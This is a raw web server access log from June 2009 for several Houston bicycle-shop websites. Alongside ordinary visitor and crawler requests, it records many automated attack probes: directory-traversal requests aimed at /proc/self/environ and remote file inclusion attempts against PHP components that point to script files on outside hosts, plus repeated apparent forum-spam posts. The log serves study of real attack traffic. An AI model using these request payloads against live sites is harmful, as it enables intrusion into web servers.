83.148.64.25 - - [11/Jun/2009:07:30:09 -0700] "GET /logs/access.log/?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "houstonbikeshop.com"
83.148.64.25 - - [11/Jun/2009:07:30:09 -0700] "GET /?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1764 "-" "libwww-perl/5.810" "houstonbikeshop.com"
83.148.64.25 - - [11/Jun/2009:07:30:09 -0700] "GET /logs/?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2368 "-" "libwww-perl/5.810" "houstonbikeshop.com"
200.234.200.120 - - [11/Jun/2009:07:30:29 -0700] "GET /logs/access.log/?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
200.234.200.120 - - [11/Jun/2009:07:30:29 -0700] "GET /logs/?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "houstonbikeshop.com"
200.234.200.120 - - [11/Jun/2009:07:30:29 -0700] "GET /?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1764 "-" "libwww-perl/5.805" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:07:31:30 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
72.183.250.41 - - [11/Jun/2009:07:33:14 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)" "www.svbikes.com"
72.183.250.41 - - [11/Jun/2009:07:33:15 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)" "www.svbikes.com"
72.183.250.41 - - [11/Jun/2009:07:33:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)" "www.svbikes.com"
77.221.130.5 - - [11/Jun/2009:07:33:17 -0700] "GET /logs/access.log/?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.5 - - [11/Jun/2009:07:33:17 -0700] "GET /?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1764 "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.5 - - [11/Jun/2009:07:33:21 -0700] "GET /logs/?includedir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "houstonbikeshop.com"
72.183.250.41 - - [11/Jun/2009:07:33:23 -0700] "GET /temporarypreviewfile.html HTTP/1.1" 200 1706 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)" "www.svbikes.com"
222.122.160.145 - - [11/Jun/2009:07:37:05 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
222.122.160.145 - - [11/Jun/2009:07:37:05 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.aslcaserta2.it/img/rhs/list.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:07:41:54 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:07:48:23 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
119.63.194.59 - - [11/Jun/2009:08:10:51 -0700] "GET /bullitinboard/viewtopic.php?p=14295 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
64.124.98.9 - - [11/Jun/2009:08:15:26 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.svbikes.com"
201.232.54.48 - - [11/Jun/2009:08:50:00 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [11/Jun/2009:08:50:00 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [11/Jun/2009:08:50:00 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [11/Jun/2009:09:17:04 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:09:21:53 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
208.80.195.41 - - [11/Jun/2009:09:34:16 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {4BA06657-9995-2DC5-148A-7839FB0705AB}; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "svbikes.com"
217.147.29.190 - - [11/Jun/2009:09:35:49 -0700] "GET /translations/Spanish.txt//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:09:35:49 -0700] "GET /translations//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:09:35:49 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:09:36:15 -0700] "GET /translations/Finnish.txt//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:09:38:45 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:09:42:01 -0700] "GET /translations/Spanish.txt%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:09:42:11 -0700] "GET /translations/Finnish.txt%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:09:46:24 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
65.55.106.238 - - [11/Jun/2009:09:54:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
65.55.106.238 - - [11/Jun/2009:10:21:12 -0700] "GET /translations/Korean.txt HTTP/1.1" 200 32652 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
123.242.165.138 - - [11/Jun/2009:10:25:58 -0700] "GET /translations/German.txt/index.php?mailSending=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
123.242.165.138 - - [11/Jun/2009:10:25:59 -0700] "GET /index.php?mailSending=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
123.242.165.138 - - [11/Jun/2009:10:25:59 -0700] "GET /translations/index.php?mailSending=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:10:28:09 -0700] "GET /logs/access.log//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:10:28:09 -0700] "GET /logs//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:10:28:09 -0700] "GET /tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.67.243 - - [11/Jun/2009:10:28:47 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:10:29:41 -0700] "GET /logs/access.log%20%20//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:10:31:49 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:10:31:49 -0700] "GET /tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:10:31:49 -0700] "GET /translations//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:10:31:58 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
208.80.195.27 - - [11/Jun/2009:10:32:24 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {14866354-02CA-4E4A-A2B1-F2098455B373}; .NET CLR 1.1.4322)" "www.svbikes.com"
217.147.29.190 - - [11/Jun/2009:10:33:29 -0700] "GET /translations//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:10:34:29 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:10:39:21 -0700] "GET /translations//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
217.147.29.190 - - [11/Jun/2009:10:39:22 -0700] "GET /tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
217.147.29.190 - - [11/Jun/2009:10:39:22 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
87.118.90.151 - - [11/Jun/2009:10:52:37 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
119.63.194.59 - - [11/Jun/2009:10:53:21 -0700] "GET /bullitinboard/viewtopic.php?p=14619 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
87.118.90.151 - - [11/Jun/2009:11:04:57 -0700] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
87.118.90.151 - - [11/Jun/2009:11:04:57 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
87.118.90.151 - - [11/Jun/2009:11:04:57 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://a222.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:11:08:27 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:11:08:27 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:11:19:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:11:19:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:11:26:09 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:11:26:14 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:11:34:32 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
123.242.165.138 - - [11/Jun/2009:11:38:11 -0700] "GET /translations/Dutch.txt/index.php?mailSending=http://www.unescoulsan.org/bbs//data/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
216.119.103.12 - - [11/Jun/2009:11:44:48 -0700] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
216.119.103.12 - - [11/Jun/2009:11:44:48 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
216.119.103.12 - - [11/Jun/2009:11:44:48 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [11/Jun/2009:11:44:50 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
216.119.103.12 - - [11/Jun/2009:11:47:30 -0700] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
216.119.103.12 - - [11/Jun/2009:11:49:14 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.119.103.12 - - [11/Jun/2009:11:49:14 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.119.103.12 - - [11/Jun/2009:11:49:14 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.119.103.12 - - [11/Jun/2009:11:49:18 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
216.119.103.12 - - [11/Jun/2009:11:50:23 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
216.119.103.12 - - [11/Jun/2009:11:50:23 -0700] "GET /translations/Hungarian.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
216.119.103.12 - - [11/Jun/2009:11:58:43 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
216.119.103.12 - - [11/Jun/2009:11:58:43 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
216.119.103.12 - - [11/Jun/2009:11:58:46 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cjmc.or.kr/data/board/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
217.147.29.190 - - [11/Jun/2009:12:12:05 -0700] "GET /logs/access.log/?sIncPath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:12:12:05 -0700] "GET /?sIncPath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.808" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:12:12:08 -0700] "GET /logs/?sIncPath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.808" "houstonbikeshop.com"
119.63.194.59 - - [11/Jun/2009:12:20:34 -0700] "GET /bullitinboard/viewtopic.php?p=13811 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
81.19.66.38 - - [11/Jun/2009:12:21:52 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jun/2009:12:21:56 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:12:23:20 -0700] "GET /translations/Spanish.txt/?sIncPath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:12:23:20 -0700] "GET /?sIncPath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 200 1764 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:12:23:20 -0700] "GET /translations/?sIncPath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 200 3847 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:12:24:50 -0700] "GET /translations/Finnish.txt/?sIncPath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:12:25:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [11/Jun/2009:12:36:16 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:12:39:08 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:12:39:08 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:12:39:11 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:12:39:18 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [11/Jun/2009:12:43:15 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
70.85.165.10 - - [11/Jun/2009:12:43:23 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:12:43:24 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:12:43:24 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
70.85.165.10 - - [11/Jun/2009:12:43:31 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
65.55.106.113 - - [11/Jun/2009:12:45:48 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
217.147.29.190 - - [11/Jun/2009:12:48:15 -0700] "GET /translations/Hungarian.txt/?sIncPath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "houstonbikeshop.com"
217.147.29.190 - - [11/Jun/2009:12:48:15 -0700] "GET /translations/?sIncPath=http://www.cjmc.or.kr/data/board/idscan.txt?? HTTP/1.1" 200 3847 "-" "libwww-perl/5.808" "houstonbikeshop.com"
61.247.222.45 - - [11/Jun/2009:12:48:34 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "houstonbikeshop.com"
61.247.222.45 - - [11/Jun/2009:12:48:36 -0700] "GET /bullitinboard/viewtopic.php?p=4134 HTTP/1.1" 200 533 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "houstonbikeshop.com"
69.65.41.165 - - [11/Jun/2009:13:09:06 -0700] "GET /2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.65.41.165 - - [11/Jun/2009:13:09:06 -0700] "GET /logs/access.log%20%20//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
69.65.41.165 - - [11/Jun/2009:13:09:06 -0700] "GET /logs//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.8.150 - - [11/Jun/2009:13:09:21 -0700] "GET /logs//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.8.150 - - [11/Jun/2009:13:09:21 -0700] "GET /logs/access.log%20%20//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.8.150 - - [11/Jun/2009:13:09:21 -0700] "GET /2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.70.103.152 - - [11/Jun/2009:13:11:21 -0700] "GET /2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.70.103.152 - - [11/Jun/2009:13:11:22 -0700] "GET /logs/access.log%20%20//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
64.70.103.152 - - [11/Jun/2009:13:11:24 -0700] "GET /logs//2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
